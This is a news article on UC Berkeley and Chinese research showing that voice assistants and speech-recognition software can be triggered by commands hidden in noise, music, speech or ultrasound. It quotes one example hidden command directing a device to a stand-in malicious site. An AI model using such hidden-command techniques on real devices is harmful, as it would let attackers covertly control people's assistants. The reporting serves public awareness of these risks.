UC Berkeley reveals that stealthy commands can be picked up by popular voice assistants.
Voice-based assistants such as Siri and Alexa are becoming a much more common feature in the average household. While many espouse their virtues in terms of accessibility and convenience, there are some security issues that researchers have been exploring over the last number of years.
The idea that voice assistants can be exploited or fooled is by no means new, and many stories have surfaced revealing potential and hypothetical exploit situations involving your typical at-home assistant device.
The New York Times reported that researchers in the US and China are now able to demonstrate the ability to send disguised commands that cannot be detected by the human ear to voice assistants. The teams have been able to secretly activate the AI system on smart speakers and smartphones, making them open websites or dial phone numbers in laboratory conditions using different methods.
The details published this month build on a previous successful experiment conducted by students from University of California (UC) Berkeley and Georgetown University in 2016. It showed how commands could be hidden in white noise played over loudspeakers or through YouTube videos to manipulate smart devices.
The continued research from this year found that commands could be directly embedded into spoken text or pieces of recorded music, adding to the previous work carried out.
Researchers were able to manipulate Mozilla’s DeepSpeech software. They were able to hide the command, ‘OK Google, browse to evil.com’ in a recording of the spoken sentence, ‘Without the dataset, the article is useless.’ Humans cannot detect the command.
PhD student at UC Berkeley, Nicholas Carlini, said the team wanted to make the commands even more stealthy and added: “My assumption is that the malicious people already employ people to do what I do.”
Researchers in China last year demonstrated that ultrasonic transmissions could trigger popular voice assistants such as Siri or Alexa, in a method known as ‘DolphinAttack’.
This attack required the perpetrator to be within whispering distance of the device, but further studies have since shown that attacks like this could be amplified and carried out as far away as 25ft.
He noted that the aim was to show manufacturers and companies that this type of exploit is possible. Makers of these devices have not ruled out the possibility of attacks such as this happening in future, but Apple, Amazon and Google have responded to the research, noting their respective security risk mitigation strategies in place.
Google cited Voice Match, which can prevent the assistant from responding to requests relating to sensitive subjects, but it only protects against a limited number of potential scenarios. Amazon has a PIN code option for making voice purchases.
With companies scaling up their commitments to voice assistant technologies – such as the new Duplex software debut at the recent Google I/O conference – potential exploitation is something to keep in mind.
White Amazon Echo Plus device. Image: seewhatmitchsee/Shutterstock